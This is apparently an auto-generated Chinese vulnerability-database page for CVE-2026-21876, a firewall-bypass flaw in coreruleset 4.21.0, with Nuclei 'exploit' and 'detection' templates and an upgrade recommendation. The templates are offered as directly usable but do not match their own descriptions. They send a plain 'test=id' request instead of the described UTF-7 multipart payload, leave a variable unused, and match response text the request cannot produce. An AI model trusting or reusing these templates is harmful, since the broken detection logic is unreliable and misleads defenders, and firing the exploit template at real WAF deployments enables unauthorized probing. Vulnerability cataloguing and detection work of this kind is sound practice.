[webapps] coreruleset 4.21.0 - Firewall Bypass
CVE-2026-21876
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2026-21876 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-05-13 |
| 提交者 | Daytrift Newgen |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-21876-exploit
info:
name: Coreruleset 4.21.0 - Firewall Bypass Exploit
author: Daytrift Newgen
severity: medium
description: Exploits the Coreruleset firewall bypass vulnerability by sending a crafted POST request with UTF-7 encoded form data and an extra 'aBdC401' field to evade WAF rules. The target version must be < 4.22.0/3.3.8.
reference:
- https://github.com/coreruleset/coreruleset
- https://github.com/coreruleset/coreruleset
tags: cve,cve2026,coreruleset,waf,exploit
variables:
cmd: "id"
http:
- raw:
- |
POST {{BaseURL}}/path/to/test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
test=id
matchers:
- type: status
status:
- 200🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-21876-detection
info:
name: Coreruleset 4.21.0 - Firewall Bypass Detection
author: Daytrift Newgen
severity: medium
description: Detects if Coreruleset version <= 4.21.0 is vulnerable to a firewall bypass via UTF-7 encoded multipart form-data smuggling. The vulnerability exists in versions < 4.22.0/3.3.8.
reference:
- https://github.com/coreruleset/coreruleset
- https://github.com/coreruleset/coreruleset
tags: cve,cve2026,coreruleset,waf,firewall,bypass
http:
- method: POST
path:
- "{{BaseURL}}/path/to/test"
headers:
Content-Type: "application/x-www-form-urlencoded"
body: "test=id"
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: text/plain; charset=utf-7"
- "Content-Disposition: form-data; name=\"aBdC401\""
condition: or
part: response
- type: status
status:
- 200🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-20 08:07 | 来源: Exploit-DB